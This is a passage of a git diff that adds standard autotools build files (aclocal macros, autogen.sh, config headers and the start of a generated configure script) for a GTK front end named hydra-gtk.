Meyering + +# serial 1 + +AC_DEFUN([AM_MAINTAINER_MODE], +[AC_MSG_CHECKING([whether to enable maintainer-specific portions of Makefiles]) + dnl maintainer-mode is disabled by default + AC_ARG_ENABLE(maintainer-mode, +[ --enable-maintainer-mode enable make rules and dependencies not useful + (and sometimes confusing) to the casual installer], + USE_MAINTAINER_MODE=$enableval, + USE_MAINTAINER_MODE=no) + AC_MSG_RESULT($USE_MAINTAINER_MODE) + AM_CONDITIONAL(MAINTAINER_MODE, test $USE_MAINTAINER_MODE = yes) + MAINT=$MAINTAINER_MODE_TRUE + AC_SUBST(MAINT)dnl +] +) + +# Define a conditional. + +AC_DEFUN([AM_CONDITIONAL], +[AC_SUBST($1_TRUE) +AC_SUBST($1_FALSE) +if $2; then + $1_TRUE= + $1_FALSE='#' +else + $1_TRUE='#' + $1_FALSE= +fi]) + +# isc-posix.m4 serial 2 (gettext-0.11.2) +dnl Copyright (C) 1995-2002 Free Software Foundation, Inc. +dnl This file is free software, distributed under the terms of the GNU +dnl General Public License. As a special exception to the GNU General +dnl Public License, this file may be distributed as part of a program +dnl that contains a configuration script generated by Autoconf, under +dnl the same distribution terms as the rest of that program. + +# This file is not needed with autoconf-2.53 and newer. Remove it in 2005. + +# This test replaces the one in autoconf. +# Currently this macro should have the same name as the autoconf macro +# because gettext's gettext.m4 (distributed in the automake package) +# still uses it. Otherwise, the use in gettext.m4 makes autoheader +# give these diagnostics: +# configure.in:556: AC_TRY_COMPILE was called before AC_ISC_POSIX +# configure.in:556: AC_TRY_RUN was called before AC_ISC_POSIX + +undefine([AC_ISC_POSIX]) + +AC_DEFUN([AC_ISC_POSIX], + [ + dnl This test replaces the obsolescent AC_ISC_POSIX kludge. + AC_CHECK_LIB(cposix, strerror, [LIBS="$LIBS -lcposix"]) + ] +) + + +# serial 1 + +# @defmac AC_PROG_CC_STDC +# @maindex PROG_CC_STDC +# @ovindex CC +# If the C compiler in not in ANSI C mode by default, try to add an option +# to output variable @code{CC} to make it so. This macro tries various +# options that select ANSI C on some system or another. It considers the +# compiler to be in ANSI C mode if it handles function prototypes correctly. +# +# If you use this macro, you should check after calling it whether the C +# compiler has been set to accept ANSI C; if not, the shell variable +# @code{am_cv_prog_cc_stdc} is set to @samp{no}. If you wrote your source +# code in ANSI C, you can make an un-ANSIfied copy of it by using the +# program @code{ansi2knr}, which comes with Ghostscript. +# @end defmac + +AC_DEFUN([AM_PROG_CC_STDC], +[AC_REQUIRE([AC_PROG_CC]) +AC_BEFORE([$0], [AC_C_INLINE]) +AC_BEFORE([$0], [AC_C_CONST]) +dnl Force this before AC_PROG_CPP. Some cpp's, eg on HPUX, require +dnl a magic option to avoid problems with ANSI preprocessor commands +dnl like #elif. +dnl FIXME: can't do this because then AC_AIX won't work due to a +dnl circular dependency. +dnl AC_BEFORE([$0], [AC_PROG_CPP]) +AC_MSG_CHECKING(for ${CC-cc} option to accept ANSI C) +AC_CACHE_VAL(am_cv_prog_cc_stdc, +[am_cv_prog_cc_stdc=no +ac_save_CC="$CC" +# Don't try gcc -ansi; that turns off useful extensions and +# breaks some systems' header files. +# AIX -qlanglvl=ansi +# Ultrix and OSF/1 -std1 +# HP-UX -Aa -D_HPUX_SOURCE +# SVR4 -Xc -D__EXTENSIONS__ +for ac_arg in "" -qlanglvl=ansi -std1 "-Aa -D_HPUX_SOURCE" "-Xc -D__EXTENSIONS__" +do + CC="$ac_save_CC $ac_arg" + AC_TRY_COMPILE( +[#include +#include +#include +#include +/* Most of the following tests are stolen from RCS 5.7's src/conf.sh. */ +struct buf { int x; }; +FILE * (*rcsopen) (struct buf *, struct stat *, int); +static char *e (p, i) + char **p; + int i; +{ + return p[i]; +} +static char *f (char * (*g) (char **, int), char **p, ...) +{ + char *s; + va_list v; + va_start (v,p); + s = g (p, va_arg (v,int)); + va_end (v); + return s; +} +int test (int i, double x); +struct s1 {int (*f) (int a);}; +struct s2 {int (*f) (double a);}; +int pairnames (int, char **, FILE *(*)(struct buf *, struct stat *, int), int, int); +int argc; +char **argv; +], [ +return f (e, argv, 0) != argv[0] || f (e, argv, 1) != argv[1]; +], +[am_cv_prog_cc_stdc="$ac_arg"; break]) +done +CC="$ac_save_CC" +]) +if test -z "$am_cv_prog_cc_stdc"; then + AC_MSG_RESULT([none needed]) +else + AC_MSG_RESULT($am_cv_prog_cc_stdc) +fi +case "x$am_cv_prog_cc_stdc" in + x|xno) ;; + *) CC="$CC $am_cv_prog_cc_stdc" ;; +esac +]) + + +dnl PKG_CHECK_MODULES(GSTUFF, gtk+-2.0 >= 1.3 glib = 1.3.4, action-if, action-not) +dnl defines GSTUFF_LIBS, GSTUFF_CFLAGS, see pkg-config man page +dnl also defines GSTUFF_PKG_ERRORS on error +AC_DEFUN(PKG_CHECK_MODULES, [ + succeeded=no + + if test -z "$PKG_CONFIG"; then + AC_PATH_PROG(PKG_CONFIG, pkg-config, no) + fi + + if test "$PKG_CONFIG" = "no" ; then + echo "*** The pkg-config script could not be found. Make sure it is" + echo "*** in your path, or set the PKG_CONFIG environment variable" + echo "*** to the full path to pkg-config." + echo "*** Or see http://www.freedesktop.org/software/pkgconfig to get pkg-config." + else + PKG_CONFIG_MIN_VERSION=0.9.0 + if $PKG_CONFIG --atleast-pkgconfig-version $PKG_CONFIG_MIN_VERSION; then + AC_MSG_CHECKING(for $2) + + if $PKG_CONFIG --exists "$2" ; then + AC_MSG_RESULT(yes) + succeeded=yes + + AC_MSG_CHECKING($1_CFLAGS) + $1_CFLAGS=`$PKG_CONFIG --cflags "$2"` + AC_MSG_RESULT($$1_CFLAGS) + + AC_MSG_CHECKING($1_LIBS) + $1_LIBS=`$PKG_CONFIG --libs "$2"` + AC_MSG_RESULT($$1_LIBS) + else + $1_CFLAGS="" + $1_LIBS="" + ## If we have a custom action on failure, don't print errors, but + ## do set a variable so people can do so. + $1_PKG_ERRORS=`$PKG_CONFIG --errors-to-stdout --print-errors "$2"` + ifelse([$4], ,echo $$1_PKG_ERRORS,) + fi + + AC_SUBST($1_CFLAGS) + AC_SUBST($1_LIBS) + else + echo "*** Your version of pkg-config is too old. You need version $PKG_CONFIG_MIN_VERSION or newer." + echo "*** See http://www.freedesktop.org/software/pkgconfig" + fi + fi + + if test $succeeded = yes; then + ifelse([$3], , :, [$3]) + else + ifelse([$4], , AC_MSG_ERROR([Library requirements ($2) not met; consider adjusting the PKG_CONFIG_PATH environment variable if your libraries are in a nonstandard prefix so pkg-config can find them.]), [$4]) + fi +]) + + + diff --git a/hydra-gtk/autogen.sh b/hydra-gtk/autogen.sh new file mode 100755 index 0000000..8fe1de8 --- /dev/null +++ b/hydra-gtk/autogen.sh @@ -0,0 +1,159 @@ +#!/bin/sh +# Run this to generate all the initial makefiles, etc. + +srcdir=`dirname $0` +test -z "$srcdir" && srcdir=. + +DIE=0 + +if [ -n "$GNOME2_DIR" ]; then + ACLOCAL_FLAGS="-I $GNOME2_DIR/share/aclocal $ACLOCAL_FLAGS" + LD_LIBRARY_PATH="$GNOME2_DIR/lib:$LD_LIBRARY_PATH" + PATH="$GNOME2_DIR/bin:$PATH" + export PATH + export LD_LIBRARY_PATH +fi + +(test -f $srcdir/configure.in) || { + echo -n "**Error**: Directory "\`$srcdir\'" does not look like the" + echo " top-level package directory" + exit 1 +} + +(autoconf --version) < /dev/null > /dev/null 2>&1 || { + echo + echo "**Error**: You must have \`autoconf' installed." + echo "Download the appropriate package for your distribution," + echo "or get the source tarball at ftp://ftp.gnu.org/pub/gnu/" + DIE=1 +} + +(grep "^AC_PROG_INTLTOOL" $srcdir/configure.in >/dev/null) && { + (intltoolize --version) < /dev/null > /dev/null 2>&1 || { + echo + echo "**Error**: You must have \`intltool' installed." + echo "You can get it from:" + echo " ftp://ftp.gnome.org/pub/GNOME/" + DIE=1 + } +} + +(grep "^AM_PROG_XML_I18N_TOOLS" $srcdir/configure.in >/dev/null) && { + (xml-i18n-toolize --version) < /dev/null > /dev/null 2>&1 || { + echo + echo "**Error**: You must have \`xml-i18n-toolize' installed." + echo "You can get it from:" + echo " ftp://ftp.gnome.org/pub/GNOME/" + DIE=1 + } +} + +(grep "^AM_PROG_LIBTOOL" $srcdir/configure.in >/dev/null) && { + (libtool --version) < /dev/null > /dev/null 2>&1 || { + echo + echo "**Error**: You must have \`libtool' installed." + echo "You can get it from: ftp://ftp.gnu.org/pub/gnu/" + DIE=1 + } +} + +(grep "^AM_GLIB_GNU_GETTEXT" $srcdir/configure.in >/dev/null) && { + (grep "sed.*POTFILES" $srcdir/configure.in) > /dev/null || \ + (glib-gettextize --version) < /dev/null > /dev/null 2>&1 || { + echo + echo "**Error**: You must have \`glib' installed." + echo "You can get it from: ftp://ftp.gtk.org/pub/gtk" + DIE=1 + } +} + +(automake --version) < /dev/null > /dev/null 2>&1 || { + echo + echo "**Error**: You must have \`automake' installed." + echo "You can get it from: ftp://ftp.gnu.org/pub/gnu/" + DIE=1 + NO_AUTOMAKE=yes +} + + +# if no automake, don't bother testing for aclocal +test -n "$NO_AUTOMAKE" || (aclocal --version) < /dev/null > /dev/null 2>&1 || { + echo + echo "**Error**: Missing \`aclocal'. The version of \`automake'" + echo "installed doesn't appear recent enough." + echo "You can get automake from ftp://ftp.gnu.org/pub/gnu/" + DIE=1 +} + +if test "$DIE" -eq 1; then + exit 1 +fi + +if test -z "$*"; then + echo "**Warning**: I am going to run \`configure' with no arguments." + echo "If you wish to pass any to it, please specify them on the" + echo \`$0\'" command line." + echo +fi + +case $CC in +xlc ) + am_opt=--include-deps;; +esac + +for coin in `find $srcdir -path $srcdir/CVS -prune -o -name configure.in -print` +do + dr=`dirname $coin` + if test -f $dr/NO-AUTO-GEN; then + echo skipping $dr -- flagged as no auto-gen + else + echo processing $dr + ( cd $dr + + aclocalinclude="$ACLOCAL_FLAGS" + + if grep "^AM_GLIB_GNU_GETTEXT" configure.in >/dev/null; then + echo "Creating $dr/aclocal.m4 ..." + test -r $dr/aclocal.m4 || touch $dr/aclocal.m4 + echo "Running glib-gettextize... Ignore non-fatal messages." + echo "no" | glib-gettextize --force --copy + echo "Making $dr/aclocal.m4 writable ..." + test -r $dr/aclocal.m4 && chmod u+w $dr/aclocal.m4 + fi + if grep "^AC_PROG_INTLTOOL" configure.in >/dev/null; then + echo "Running intltoolize..." + intltoolize --copy --force --automake + fi + if grep "^AM_PROG_XML_I18N_TOOLS" configure.in >/dev/null; then + echo "Running xml-i18n-toolize..." + xml-i18n-toolize --copy --force --automake + fi + if grep "^AM_PROG_LIBTOOL" configure.in >/dev/null; then + if test -z "$NO_LIBTOOLIZE" ; then + echo "Running libtoolize..." + libtoolize --force --copy + fi + fi + echo "Running aclocal $aclocalinclude ..." + aclocal $aclocalinclude + if grep "^AM_CONFIG_HEADER" configure.in >/dev/null; then + echo "Running autoheader..." + autoheader + fi + echo "Running automake --gnu $am_opt ..." + automake --add-missing --gnu $am_opt + echo "Running autoconf ..." + autoconf + ) + fi +done + +conf_flags="--enable-maintainer-mode" + +if test x$NOCONFIGURE = x; then + echo Running $srcdir/configure $conf_flags "$@" ... + $srcdir/configure $conf_flags "$@" \ + && echo Now type \`make\' to compile. || exit 1 +else + echo Skipping configure process. +fi diff --git a/hydra-gtk/config.h b/hydra-gtk/config.h new file mode 100755 index 0000000..dcd9668 --- /dev/null +++ b/hydra-gtk/config.h @@ -0,0 +1,33 @@ +/* config.h. Generated by configure. */ +/* config.h.in. Generated from configure.in by autoheader. */ +/* #undef ENABLE_NLS */ +/* #undef HAVE_CATGETS */ +/* #undef HAVE_GETTEXT */ +/* #undef GETTEXT_PACKAGE */ +/* #undef HAVE_LC_MESSAGES */ +/* #undef HAVE_STPCPY */ +/* #undef HAVE_LIBSM */ + +/* Name of package */ +#define PACKAGE "xhydra" + +/* Define to the address where bug reports for this package should be sent. */ +#define PACKAGE_BUGREPORT "" + +/* Define to the full name of this package. */ +#define PACKAGE_NAME "" + +/* Define to the full name and version of this package. */ +#define PACKAGE_STRING "" + +/* Define to the one symbol short name of this package. */ +#define PACKAGE_TARNAME "" + +/* Define to the version of this package. */ +#define PACKAGE_VERSION "" + +/* Define to 1 if you have the ANSI C header files. */ +#define STDC_HEADERS 1 + +/* Version number of package */ +#define VERSION "0.1" diff --git a/hydra-gtk/config.h.in b/hydra-gtk/config.h.in new file mode 100755 index 0000000..6592d48 --- /dev/null +++ b/hydra-gtk/config.h.in @@ -0,0 +1,32 @@ +/* config.h.in. Generated from configure.in by autoheader. */ +#undef ENABLE_NLS +#undef HAVE_CATGETS +#undef HAVE_GETTEXT +#undef GETTEXT_PACKAGE +#undef HAVE_LC_MESSAGES +#undef HAVE_STPCPY +#undef HAVE_LIBSM + +/* Name of package */ +#undef PACKAGE + +/* Define to the address where bug reports for this package should be sent. */ +#undef PACKAGE_BUGREPORT + +/* Define to the full name of this package. */ +#undef PACKAGE_NAME + +/* Define to the full name and version of this package. */ +#undef PACKAGE_STRING + +/* Define to the one symbol short name of this package. */ +#undef PACKAGE_TARNAME + +/* Define to the version of this package. */ +#undef PACKAGE_VERSION + +/* Define to 1 if you have the ANSI C header files. */ +#undef STDC_HEADERS + +/* Version number of package */ +#undef VERSION diff --git a/hydra-gtk/configure b/hydra-gtk/configure new file mode 100755 index 0000000..287741e --- /dev/null +++ b/hydra-gtk/configure @@ -0,0 +1,5203 @@ +#! /bin/sh +# Guess values for system-dependent variables and create Makefiles. +# Generated by GNU Autoconf 2.59. +# +# Copyright (C) 2003 Free Software Foundation, Inc. +# This configure script is free software; the Free Software Foundation +# gives unlimited permission to copy, distribute and modify it. +## --------------------- ## +## M4sh Initialization. ## +## --------------------- ## + +# Be Bourne compatible +if test -n "${ZSH_VERSION+set}" && (emulate sh) >/dev/null 2>&1; then + emulate sh + NULLCMD=: + # Zsh 3.x and 4.x performs word splitting on ${1+"$@"}, which + # is contrary to our usage. Disable this feature. + alias -g '${1+"$@"}'='"$@"' +elif test -n "${BASH_VERSION+set}" && (set -o posix) >/dev/null 2>&1; then + set -o posix +fi +DUALCASE=1; export DUALCASE # for MKS sh + +# Support unset when possible. +if ( (MAIL=60; unset MAIL) || exit) >/dev/null 2>&1; then + as_unset=unset +else + as_unset=false +fi + + +# Work around bugs in pre-3.0 UWIN ksh. +$as_unset ENV MAIL MAILPATH +PS1='$ ' +PS2='> ' +PS4='+ ' + +# NLS nuisances. +for as_var in \ + LANG LANGUAGE LC_ADDRESS LC_ALL LC_COLLATE LC_CTYPE LC_IDENTIFICATION \ + LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER \ + LC_TELEPHONE LC_TIME +do + if (set +x; test -z "`(eval $as_var=C; export $as_var) 2>&1`"); then + eval $as_var=C; export $as_var + else + $as_unset $as_var + fi +done + +# Required to use basename. +if expr a : '\(a\)' >/dev/null 2>&1; then + as_expr=expr +else + as_expr=false +fi + +if (basename /) >/dev/null 2>&1 && test "X`basename / 2>&1`" = "X/"; then + as_basename=basename +else + as_basename=false +fi + + +# Name of the executable. +as_me=`$as_basename "$0" || +$as_expr X/"$0" : '.*/\([^/][^/]*\)/*$' \| \ + X"$0" : 'X\(//\)$' \| \ + X"$0" : 'X\(/\)$' \| \ + . : '\(.\)' 2>/dev/null || +echo X/"$0" | + sed '/^.*\/\([^/][^/]*\)\/*$/{ s//\1/; q; } + /^X\/\(\/\/\)$/{ s//\1/; q; } + /^X\/\(\/\).*/{ s//\1/; q; } + s/.*/./; q'` + + +# PATH needs CR, and LINENO needs CR and PATH. +# Avoid depending upon Character Ranges. +as_cr_letters='abcdefghijklmnopqrstuvwxyz' +as_cr_LETTERS='ABCDEFGHIJKLMNOPQRSTUVWXYZ' +as_cr_Letters=$as_cr_letters$as_cr_LETTERS +as_cr_digits='0123456789' +as_cr_alnum=$as_cr_Letters$as_cr_digits + +# The user is always right. +if test "${PATH_SEPARATOR+set}" != set; then + echo "#! /bin/sh" >conf$$.sh + echo "exit 0" >>conf$$.sh + chmod +x conf$$.sh + if (PATH="/nonexistent;."; conf$$.sh) >/dev/null 2>&1; then + PATH_SEPARATOR=';' + else + PATH_SEPARATOR=: + fi + rm -f conf$$.sh +fi + + + as_lineno_1=$LINENO + as_lineno_2=$LINENO + as_lineno_3=`(expr $as_lineno_1 + 1) 2>/dev/null` + test "x$as_lineno_1" != "x$as_lineno_2" && + test "x$as_lineno_3" = "x$as_lineno_2" || { + # Find who we are. Look in the path if we contain no path at all + # relative or not. + case $0 in + *[\\/]* ) as_myself=$0 ;; + *) as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +for as_dir in $PATH +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + test -r "$as_dir/$0" && as_myself=$as_dir/$0 && break +done + + ;; + esac + # We did not find ourselves, most probably we were run as `sh COMMAND' + # in which case we are not to be found in the path. + if test "x$as_myself" = x; then + as_myself=$0 + fi + if test ! -f "$as_myself"; then + { echo "$as_me: error: cannot find myself; rerun with an absolute path" >&2 + { (exit 1); exit 1; }; } + fi + case $CONFIG_SHELL in + '') + as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +for as_dir in /bin$PATH_SEPARATOR/usr/bin$PATH_SEPARATOR$PATH +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + for as_base in sh bash ksh sh5; do + case $as_dir in + /*) + if ("$as_dir/$as_base" -c ' + as_lineno_1=$LINENO + as_lineno_2=$LINENO + as_lineno_3=`(expr $as_lineno_1 + 1) 2>/dev/null` + test "x$as_lineno_1" != "x$as_lineno_2" && + test "x$as_lineno_3" = "x$as_lineno_2" ') 2>/dev/null; then + $as_unset BASH_ENV || test "${BASH_ENV+set}" != set || { BASH_ENV=; export BASH_ENV; } + $as_unset ENV || test "${ENV+set}" != set || { ENV=; export ENV; } + CONFIG_SHELL=$as_dir/$as_base + export CONFIG_SHELL + exec "$CONFIG_SHELL" "$0" ${1+"$@"} + fi;; + esac + done +done +;; + esac + + # Create $as_me.lineno as a copy of $as_myself, but with $LINENO + # uniformly replaced by the line number. The first 'sed' inserts a + # line-number line before each line; the second 'sed' does the real + # work. The second script uses 'N' to pair each line-number line + # with the numbered line, and appends trailing '-' during + # substitution so that $LINENO is not a special case at line end. + # (Raja R Harinath suggested sed '=', and Paul Eggert wrote the + # second 'sed' script. Blame Lee E. McMahon for sed's syntax. :-) + sed '=' <$as_myself | + sed ' + N + s,$,-, + : loop + s,^\(['$as_cr_digits']*\)\(.*\)[$]LINENO\([^'$as_cr_alnum'_]\),\1\2\1\3, + t loop + s,-$,, + s,^['$as_cr_digits']*\n,, + ' >$as_me.lineno && + chmod +x $as_me.lineno || + { echo "$as_me: error: cannot create $as_me.lineno; rerun with a POSIX shell" >&2 + { (exit 1); exit 1; }; } + + # Don't try to exec as it changes $[0], causing all sort of problems + # (the dirname of $[0] is not the place where we might find the + # original and so on. Autoconf is especially sensible to this). + . ./$as_me.lineno + # Exit status is that of the last command. + exit +} + + +case `echo "testing\c"; echo 1,2,3`,`echo -n testing; echo 1,2,3` in + *c*,-n*) ECHO_N= ECHO_C=' +' ECHO_T=' ' ;; + *c*,* ) ECHO_N=-n ECHO_C= ECHO_T= ;; + *) ECHO_N= ECHO_C='\c' ECHO_T= ;; +esac + +if expr a : '\(a\)' >/dev/null 2>&1; then + as_expr=expr +else + as_expr=false +fi + +rm -f conf$$ conf$$.exe conf$$.file +echo >conf$$.file +if ln -s conf$$.file conf$$ 2>/dev/null; then + # We could just check for DJGPP; but this test a) works b) is more generic + # and c) will remain valid once DJGPP supports symlinks (DJGPP 2.04). + if test -f conf$$.exe; then + # Don't use ln at all; we don't have any links + as_ln_s='cp -p' + else + as_ln_s='ln -s' + fi +elif ln conf$$.file conf$$ 2>/dev/null; then + as_ln_s=ln +else + as_ln_s='cp -p' +fi +rm -f conf$$ conf$$.exe conf$$.file + +if mkdir -p . 2>/dev/null; then + as_mkdir_p=: +else + test -d ./-p && rmdir ./-p + as_mkdir_p=false +fi + +as_executable_p="test -f" + +# Sed expression to map a string onto a valid CPP name. +as_tr_cpp="eval sed 'y%*$as_cr_letters%P$as_cr_LETTERS%;s%[^_$as_cr_alnum]%_%g'" + +# Sed expression to map a string onto a valid variable name. +as_tr_sh="eval sed 'y%*+%pp%;s%[^_$as_cr_alnum]%_%g'" + + +# IFS +# We need space, tab and new line, in precisely that order. +as_nl=' +' +IFS=" $as_nl" + +# CDPATH. +$as_unset CDPATH + + +# Name of the host. +# hostname on some systems (SVR3.2, Linux) returns a bogus exit status, +# so uname gets run too. +ac_hostname=`(hostname || uname -n) 2>/dev/null | sed 1q` + +exec 6>&1 + +# +# Initializations. +# +ac_default_prefix=/usr/local +ac_config_libobj_dir=. +cross_compiling=no +subdirs= +MFLAGS= +MAKEFLAGS= +SHELL=${CONFIG_SHELL-/bin/sh} + +# Maximum number of lines to put in a shell here document. +# This variable seems obsolete. It should probably be removed, and +# only ac_max_sed_lines should be used. +: ${ac_max_here_lines=38} + +# Identity of this package. +PACKAGE_NAME= +PACKAGE_TARNAME= +PACKAGE_VERSION= +PACKAGE_STRING= +PACKAGE_BUGREPORT= + +ac_unique_file="configure.in" +ac_subst_vars='SHELL PATH_SEPARATOR PACKAGE_NAME PACKAGE_TARNAME PACKAGE_VERSION PACKAGE_STRING PACKAGE_BUGREPORT exec_prefix prefix program_transform_name bindir sbindir libexecdir datadir sysconfdir sharedstatedir localstatedir libdir includedir oldincludedir infodir mandir build_alias host_alias target_alias DEFS ECHO_C ECHO_N ECHO_T LIBS INSTALL_PROGRAM INSTALL_SCRIPT INSTALL_DATA PACKAGE VERSION ACLOCAL AUTOCONF AUTOMAKE AUTOHEADER MAKEINFO SET_MAKE MAINTAINER_MODE_TRUE MAINTAINER_MODE_FALSE MAINT CC CFLAGS LDFLAGS CPPFLAGS ac_ct_CC EXEEXT OBJEXT CPP EGREP PKG_CONFIG PACKAGE_CFLAGS PACKAGE_LIBS LIBOBJS LTLIBOBJS' +ac_subst_files='' + +# Initialize some variables set by options. +ac_init_help= +ac_init_version=false +# The variables have the same names as the options, with +# dashes changed to underlines. +cache_file=/dev/null +exec_prefix=NONE +no_create= +no_recursion= +prefix=NONE +program_prefix=NONE +program_suffix=NONE +program_transform_name=s,x,x, +silent= +site= +srcdir= +verbose= +x_includes=NONE +x_libraries=NONE + +# Installation directory options. +# These are left unexpanded so users can "make install exec_prefix=/foo" +# and all the variables that are supposed to be based on exec_prefix +# by default will actually change. +# Use braces instead of parens because sh, perl, etc. also accept them. +bindir='${exec_prefix}/bin' +sbindir='${exec_prefix}/sbin' +libexecdir='${exec_prefix}/libexec' +datadir='${prefix}/share' +sysconfdir='${prefix}/etc' +sharedstatedir='${prefix}/com' +localstatedir='${prefix}/var' +libdir='${exec_prefix}/lib' +includedir='${prefix}/include' +oldincludedir='/usr/include' +infodir='${prefix}/info' +mandir='${prefix}/man' + +ac_prev= +for ac_option +do + # If the previous option needs an argument, assign it. + if test -n "$ac_prev"; then + eval "$ac_prev=\$ac_option" + ac_prev= + continue + fi + + ac_optarg=`expr "x$ac_option" : 'x[^=]*=\(.*\)'` + + # Accept the important Cygnus configure options, so we can diagnose typos. + + case $ac_option in + + -bindir | --bindir | --bindi | --bind | --bin | --bi) + ac_prev=bindir ;; + -bindir=* | --bindir=* | --bindi=* | --bind=* | --bin=* | --bi=*) + bindir=$ac_optarg ;; + + -build | --build | --buil | --bui | --bu) + ac_prev=build_alias ;; + -build=* | --build=* | --buil=* | --bui=* | --bu=*) + build_alias=$ac_optarg ;; + + -cache-file | --cache-file | --cache-fil | --cache-fi \ + | --cache-f | --cache- | --cache | --cach | --cac | --ca | --c) + ac_prev=cache_file ;; + -cache-file=* | --cache-file=* | --cache-fil=* | --cache-fi=* \ + | --cache-f=* | --cache-=* | --cache=* | --cach=* | --cac=* | --ca=* | --c=*) + cache_file=$ac_optarg ;; + + --config-cache | -C) + cache_file=config.cache ;; + + -datadir | --datadir | --datadi | --datad | --data | --dat | --da) + ac_prev=datadir ;; + -datadir=* | --datadir=* | --datadi=* | --datad=* | --data=* | --dat=* \ + | --da=*) + datadir=$ac_optarg ;; + + -disable-* | --disable-*) + ac_feature=`expr "x$ac_option" : 'x-*disable-\(.*\)'` + # Reject names that are not valid shell variable names. + expr "x$ac_feature" : ".*[^-_$as_cr_alnum]" >/dev/null && + { echo "$as_me: error: invalid feature name: $ac_feature" >&2 + { (exit 1); exit 1; }; } + ac_feature=`echo $ac_feature | sed 's/-/_/g'` + eval "enable_$ac_feature=no" ;; + + -enable-* | --enable-*) + ac_feature=`expr "x$ac_option" : 'x-*enable-\([^=]*\)'` + # Reject names that are not valid shell variable names. + expr "x$ac_feature" : ".*[^-_$as_cr_alnum]" >/dev/null && + { echo "$as_me: error: invalid feature name: $ac_feature" >&2 + { (exit 1); exit 1; }; } + ac_feature=`echo $ac_feature | sed 's/-/_/g'` + case $ac_option in + *=*) ac_optarg=`echo "$ac_optarg" | sed "s/'/'\\\\\\\\''/g"`;; + *) ac_optarg=yes ;; + esac + eval "enable_$ac_feature='$ac_optarg'" ;; + + -exec-prefix | --exec_prefix | --exec-prefix | --exec-prefi \ + | --exec-pref | --exec-pre | --exec-pr | --exec-p | --exec- \ + | --exec | --exe | --ex) + ac_prev=exec_prefix ;; + -exec-prefix=* | --exec_prefix=* | --exec-prefix=* | --exec-prefi=* \ + | --exec-pref=* | --exec-pre=* | --exec-pr=* | --exec-p=* | --exec-=* \ + | --exec=* | --exe=* | --ex=*) + exec_prefix=$ac_optarg ;; + + -gas | --gas | --ga | --g) + # Obsolete; use --with-gas. + with_gas=yes ;; + + -help | --help | --hel | --he | -h) + ac_init_help=long ;; + -help=r* | --help=r* | --hel=r* | --he=r* | -hr*) + ac_init_help=recursive ;; + -help=s* | --help=s* | --hel=s* | --he=s* | -hs*) + ac_init_help=short ;; + + -host | --host | --hos | --ho) + ac_prev=host_alias ;; + -host=* | --host=* | --hos=* | --ho=*) + host_alias=$ac_optarg ;; + + -includedir | --includedir | --includedi | --included | --include \ + | --includ | --inclu | --incl | --inc) + ac_prev=includedir ;; + -includedir=* | --includedir=* | --includedi=* | --included=* | --include=* \ + | --includ=* | --inclu=* | --incl=* | --inc=*) + includedir=$ac_optarg ;; + + -infodir | --infodir | --infodi | --infod | --info | --inf) + ac_prev=infodir ;; + -infodir=* | --infodir=* | --infodi=* | --infod=* | --info=* | --inf=*) + infodir=$ac_optarg ;; + + -libdir | --libdir | --libdi | --libd) + ac_prev=libdir ;; + -libdir=* | --libdir=* | --libdi=* | --libd=*) + libdir=$ac_optarg ;; + + -libexecdir | --libexecdir | --libexecdi | --libexecd | --libexec \ + | --libexe | --libex | --libe) + ac_prev=libexecdir ;; + -libexecdir=* | --libexecdir=* | --libexecdi=* | --libexecd=* | --libexec=* \ + | --libexe=* | --libex=* | --libe=*) + libexecdir=$ac_optarg ;; + + -localstatedir | --localstatedir | --localstatedi | --localstated \ + | --localstate | --localstat | --localsta | --localst \ + | --locals | --local | --loca | --loc | --lo) + ac_prev=localstatedir ;; + -localstatedir=* | --localstatedir=* | --localstatedi=* | --localstated=* \ + | --localstate=* | --localstat=* | --localsta=* | --localst=* \ + | --locals=* | --local=* | --loca=* | --loc=* | --lo=*) + localstatedir=$ac_optarg ;; + + -mandir | --mandir | --mandi | --mand | --man | --ma | --m) + ac_prev=mandir ;; + -mandir=* | --mandir=* | --mandi=* | --mand=* | --man=* | --ma=* | --m=*) + mandir=$ac_optarg ;; + + -nfp | --nfp | --nf) + # Obsolete; use --without-fp. + with_fp=no ;; + + -no-create | --no-create | --no-creat | --no-crea | --no-cre \ + | --no-cr | --no-c | -n) + no_create=yes ;; + + -no-recursion | --no-recursion | --no-recursio | --no-recursi \ + | --no-recurs | --no-recur | --no-recu | --no-rec | --no-re | --no-r) + no_recursion=yes ;; + + -oldincludedir | --oldincludedir | --oldincludedi | --oldincluded \ + | --oldinclude | --oldinclud | --oldinclu | --oldincl | --oldinc \ + | --oldin | --oldi | --old | --ol | --o) + ac_prev=oldincludedir ;; + -oldincludedir=* | --oldincludedir=* | --oldincludedi=* | --oldincluded=* \ + | --oldinclude=* | --oldinclud=* | --oldinclu=* | --oldincl=* | --oldinc=* \ + | --oldin=* | --oldi=* | --old=* | --ol=* | --o=*) + oldincludedir=$ac_optarg ;; + + -prefix | --prefix | --prefi | --pref | --pre | --pr | --p) + ac_prev=prefix ;; + -prefix=* | --prefix=* | --prefi=* | --pref=* | --pre=* | --pr=* | --p=*) + prefix=$ac_optarg ;; + + -program-prefix | --program-prefix | --program-prefi | --program-pref \ + | --program-pre | --program-pr | --program-p) + ac_prev=program_prefix ;; + -program-prefix=* | --program-prefix=* | --program-prefi=* \ + | --program-pref=* | --program-pre=* | --program-pr=* | --program-p=*) + program_prefix=$ac_optarg ;; + + -program-suffix | --program-suffix | --program-suffi | --program-suff \ + | --program-suf | --program-su | --program-s) + ac_prev=program_suffix ;; + -program-suffix=* | --program-suffix=* | --program-suffi=* \ + | --program-suff=* | --program-suf=* | --program-su=* | --program-s=*) + program_suffix=$ac_optarg ;; + + -program-transform-name | --program-transform-name \ + | --program-transform-nam | --program-transform-na \ + | --program-transform-n | --program-transform- \ + | --program-transform | --program-transfor \ + | --program-transfo | --program-transf \ + | --program-trans | --program-tran \ + | --progr-tra | --program-tr | --program-t) + ac_prev=program_transform_name ;; + -program-transform-name=* | --program-transform-name=* \ + | --program-transform-nam=* | --program-transform-na=* \ + | --program-transform-n=* | --program-transform-=* \ + | --program-transform=* | --program-transfor=* \ + | --program-transfo=* | --program-transf=* \ + | --program-trans=* | --program-tran=* \ + | --progr-tra=* | --program-tr=* | --program-t=*) + program_transform_name=$ac_optarg ;; + + -q | -quiet | --quiet | --quie | --qui | --qu | --q 